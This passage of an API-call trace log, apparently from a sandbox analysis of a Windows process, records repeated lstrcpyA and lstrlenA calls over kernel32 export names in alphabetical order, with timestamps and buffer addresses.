(lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.850] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.850] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.850] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.850] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.850] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.850] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.850] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.850] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.850] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.850] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.851] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.851] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.851] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.851] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.851] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.851] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.851] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.851] lstrlenA (lpString="BEEP") returned 4 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.851] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.851] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.851] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.851] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.851] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.851] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.851] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.851] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.851] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.851] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.851] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.851] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.852] lstrlenA (lpString="CANCELIO") returned 8 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.852] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.852] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.852] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.852] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.852] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.852] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.852] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.852] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.852] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.852] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.852] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.852] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.852] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.852] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.852] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.852] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.852] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.852] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.853] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.853] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.853] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.853] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.853] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.853] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.853] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.853] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.853] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.853] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.853] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.853] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.853] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.853] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.853] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.853] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.853] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.853] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.853] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.853] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.854] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.854] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.854] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.854] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.854] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.854] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.854] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.854] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.854] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.854] lstrlenA (lpString="COPYFILEA") returned 9 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.854] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.854] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.854] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.854] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.854] lstrlenA (lpString="COPYFILEW") returned 9 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.854] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.854] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.854] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.854] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.854] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.855] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.855] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.855] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.855] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.855] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.855] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.855] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.855] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.855] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.855] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.855] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.855] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.855] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.855] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.855] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.855] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.855] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.855] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.855] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.855] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.856] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.856] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.856] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.856] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.856] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.856] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.856] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.856] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.856] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.856] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.856] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.856] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.856] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.856] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.856] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.856] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.856] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.856] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.856] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.857] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.857] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.857] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.857] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.857] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.857] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.857] lstrcpyA (in: lpString1=0x3f2c580, 